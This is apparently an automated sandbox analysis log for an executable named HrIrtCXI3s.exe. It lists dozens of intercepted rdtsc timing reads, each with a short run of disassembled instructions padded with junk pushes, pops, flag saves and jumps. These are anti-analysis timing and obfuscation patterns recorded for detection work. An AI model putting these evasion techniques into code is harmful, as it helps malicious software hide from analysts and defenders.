Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220C25 second address: 7220C8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFBBCAD7290h 0x00000008 pop eax 0x00000009 mov dx, 2796h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [ebp-0Ch] 0x00000013 pushad 0x00000014 mov dx, 936Eh 0x00000018 pushfd 0x00000019 jmp 00007FFBBCAD728Fh 0x0000001e add cx, B41Eh 0x00000023 jmp 00007FFBBCAD7299h 0x00000028 popfd 0x00000029 popad 0x0000002a mov dword ptr [esi+04h], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FFBBCAD728Dh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220C8A second address: 7220D45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+78h] 0x0000000c jmp 00007FFBBCD9554Eh 0x00000011 push 00000001h 0x00000013 jmp 00007FFBBCD95550h 0x00000018 nop 0x00000019 pushad 0x0000001a pushad 0x0000001b movzx ecx, di 0x0000001e pushfd 0x0000001f jmp 00007FFBBCD95559h 0x00000024 sbb si, 27C6h 0x00000029 jmp 00007FFBBCD95551h 0x0000002e popfd 0x0000002f popad 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FFBBCD9554Eh 0x00000037 add cx, B068h 0x0000003c jmp 00007FFBBCD9554Bh 0x00000041 popfd 0x00000042 mov edi, ecx 0x00000044 popad 0x00000045 popad 0x00000046 push eax 0x00000047 jmp 00007FFBBCD95555h 0x0000004c nop 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FFBBCD9554Dh 0x00000054 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220D45 second address: 7220D63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7291h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-08h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov di, si 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220DCC second address: 7220E5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007FFBBCD9554Eh 0x0000000b adc eax, 6186EEA8h 0x00000011 jmp 00007FFBBCD9554Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov edi, eax 0x0000001c pushad 0x0000001d mov dx, cx 0x00000020 pushfd 0x00000021 jmp 00007FFBBCD95550h 0x00000026 jmp 00007FFBBCD95555h 0x0000002b popfd 0x0000002c popad 0x0000002d test edi, edi 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov dx, A14Eh 0x00000036 pushfd 0x00000037 jmp 00007FFBBCD9554Fh 0x0000003c or si, F9FEh 0x00000041 jmp 00007FFBBCD95559h 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220E5C second address: 7220E99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 4099h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FFC2A6B5AD9h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FFBBCAD7291h 0x00000019 or ah, FFFFFFE6h 0x0000001c jmp 00007FFBBCAD7291h 0x00000021 popfd 0x00000022 mov ch, 9Dh 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220E99 second address: 7220EC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD9554Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFBBCD95557h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220EC3 second address: 7220F41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c jmp 00007FFBBCAD728Eh 0x00000011 lea eax, dword ptr [ebx+70h] 0x00000014 pushad 0x00000015 jmp 00007FFBBCAD728Eh 0x0000001a pushfd 0x0000001b jmp 00007FFBBCAD7292h 0x00000020 xor si, C1A8h 0x00000025 jmp 00007FFBBCAD728Bh 0x0000002a popfd 0x0000002b popad 0x0000002c push 00000001h 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FFBBCAD7295h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220F41 second address: 7220FE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FFBBCD9554Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FFBBCD95557h 0x00000018 or cl, FFFFFFAEh 0x0000001b jmp 00007FFBBCD95559h 0x00000020 popfd 0x00000021 mov ax, A637h 0x00000025 popad 0x00000026 pushfd 0x00000027 jmp 00007FFBBCD9554Ch 0x0000002c xor ecx, 3243AB28h 0x00000032 jmp 00007FFBBCD9554Bh 0x00000037 popfd 0x00000038 popad 0x00000039 nop 0x0000003a jmp 00007FFBBCD95556h 0x0000003f lea eax, dword ptr [ebp-18h] 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 pushad 0x00000046 popad 0x00000047 mov eax, edx 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220FE4 second address: 7221022 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7294h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FFBBCAD7290h 0x0000000f push eax 0x00000010 pushad 0x00000011 call 00007FFBBCAD7291h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221022 second address: 7221035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 movsx ebx, ax 0x00000008 popad 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cl, bh 0x0000000f mov di, si 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221035 second address: 722103B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221094 second address: 7221098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221098 second address: 722109E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722109E second address: 72210BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBBCD95559h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72210BB second address: 7221163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a pushad 0x0000000b mov bx, 255Eh 0x0000000f push edx 0x00000010 jmp 00007FFBBCAD7292h 0x00000015 pop eax 0x00000016 popad 0x00000017 js 00007FFC2A6B5856h 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FFBBCAD7297h 0x00000024 jmp 00007FFBBCAD7293h 0x00000029 popfd 0x0000002a movzx esi, bx 0x0000002d popad 0x0000002e mov eax, dword ptr [ebp-14h] 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007FFBBCAD728Ch 0x0000003a jmp 00007FFBBCAD7295h 0x0000003f popfd 0x00000040 pushfd 0x00000041 jmp 00007FFBBCAD7290h 0x00000046 and esi, 608BA548h 0x0000004c jmp 00007FFBBCAD728Bh 0x00000051 popfd 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221163 second address: 7221188 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221188 second address: 722118C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722118C second address: 7221192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221192 second address: 72211A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBBCAD7291h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72211A7 second address: 72211B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72211B8 second address: 72211CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7292h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72211CE second address: 722126A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov al, bh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov edx, 74E806ECh 0x0000000f pushad 0x00000010 jmp 00007FFBBCD95551h 0x00000015 popad 0x00000016 sub eax, eax 0x00000018 pushad 0x00000019 mov edi, 29EEAEE0h 0x0000001e mov edx, 613FD90Ch 0x00000023 popad 0x00000024 lock cmpxchg dword ptr [edx], ecx 0x00000028 pushad 0x00000029 call 00007FFBBCD95551h 0x0000002e pushfd 0x0000002f jmp 00007FFBBCD95550h 0x00000034 sbb esi, 4E975458h 0x0000003a jmp 00007FFBBCD9554Bh 0x0000003f popfd 0x00000040 pop esi 0x00000041 popad 0x00000042 pop edi 0x00000043 jmp 00007FFBBCD95552h 0x00000048 test eax, eax 0x0000004a jmp 00007FFBBCD95550h 0x0000004f jne 00007FFC2A9739C4h 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722126A second address: 722126E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722126E second address: 7221272 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221272 second address: 7221278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221278 second address: 722129F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ebx, 68888860h 0x00000014 mov ax, bx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722129F second address: 72212A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72212A5 second address: 72212A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72212A9 second address: 72212C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD728Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov ebx, esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722145A second address: 722147D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFBBCD95551h 0x00000009 jmp 00007FFBBCD9554Bh 0x0000000e popfd 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72215E6 second address: 722160E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 mov ebx, 4AAFFA46h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov word ptr [edx+30h], ax 0x00000011 jmp 00007FFBBCAD728Dh 0x00000016 mov ax, word ptr [esi+32h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722160E second address: 7221614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221614 second address: 722161A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722161A second address: 722161E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722161E second address: 722165E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+32h], ax 0x0000000c jmp 00007FFBBCAD7298h 0x00000011 mov eax, dword ptr [esi+34h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FFBBCAD7297h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722165E second address: 722168D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+34h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFBBCD9554Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722168D second address: 7221693 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221693 second address: 7221697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221697 second address: 72216AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, 00000700h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov si, C477h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72216AF second address: 7221707 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFBBCD95559h 0x00000008 pop esi 0x00000009 mov edx, 62C5D944h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jne 00007FFC2A973589h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FFBBCD95554h 0x00000020 adc ax, C5F8h 0x00000025 jmp 00007FFBBCD9554Bh 0x0000002a popfd 0x0000002b movzx eax, dx 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221707 second address: 7221761 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7292h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or dword ptr [edx+38h], FFFFFFFFh 0x0000000d jmp 00007FFBBCAD7290h 0x00000012 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000016 pushad 0x00000017 mov dx, si 0x0000001a pushfd 0x0000001b jmp 00007FFBBCAD728Ah 0x00000020 sbb esi, 36902AB8h 0x00000026 jmp 00007FFBBCAD728Bh 0x0000002b popfd 0x0000002c popad 0x0000002d or dword ptr [edx+40h], FFFFFFFFh 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221761 second address: 7221765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221765 second address: 722176B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722176B second address: 7221793 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD9554Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFBBCD95557h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7221793 second address: 72217B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop ecx 0x0000000f mov esi, edi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7270CDE second address: 7270D1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 1994E581h 0x00000008 pushfd 0x00000009 jmp 00007FFBBCD9554Eh 0x0000000e and al, FFFFFF98h 0x00000011 jmp 00007FFBBCD9554Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FFBBCD95550h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7270D1C second address: 7270D2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD728Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7270D2B second address: 7270D33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7270D33 second address: 7270D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FFBBCAD7299h 0x00000012 add cx, 6246h 0x00000017 jmp 00007FFBBCAD7291h 0x0000001c popfd 0x0000001d jmp 00007FFBBCAD7290h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7270D81 second address: 7270D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7210821 second address: 721083A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 mov bl, 60h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFBBCAD728Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 721083A second address: 721089E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FFBBCD95551h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FFBBCD9554Eh 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 mov edx, ecx 0x0000001a pushad 0x0000001b movzx ecx, dx 0x0000001e jmp 00007FFBBCD95555h 0x00000023 popad 0x00000024 popad 0x00000025 pop ebp 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 721089E second address: 72108A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71B0050 second address: 71B008C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 78h 0x00000005 mov di, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 movsx edx, cx 0x00000013 pushfd 0x00000014 jmp 00007FFBBCD95556h 0x00000019 sbb ax, 2448h 0x0000001e jmp 00007FFBBCD9554Bh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71B077B second address: 71B0781 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71B0781 second address: 71B07D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FFBBCD95550h 0x0000000f mov ebp, esp 0x00000011 jmp 00007FFBBCD95550h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FFBBCD95557h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71B0C40 second address: 71B0C46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71B0C46 second address: 71B0C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71B0C4A second address: 71B0C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71B0C4E second address: 71B0C62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, 124601FFh 0x00000011 mov bl, cl 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71B0C62 second address: 71B0C68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71B0C68 second address: 71B0C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71B0C6C second address: 71B0CA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7298h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FFBBCAD7297h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7200936 second address: 720093A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 720093A second address: 720093E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 720093E second address: 7200944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7200944 second address: 72009A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7294h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007FFBBCAD728Fh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 movzx eax, dx 0x0000001a mov edx, 56080554h 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 mov edx, 664EAAECh 0x00000028 push edi 0x00000029 call 00007FFBBCAD7290h 0x0000002e pop eax 0x0000002f pop ebx 0x00000030 popad 0x00000031 pop ebp 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 mov ecx, edx 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72009A0 second address: 72009A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72009A6 second address: 72009AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
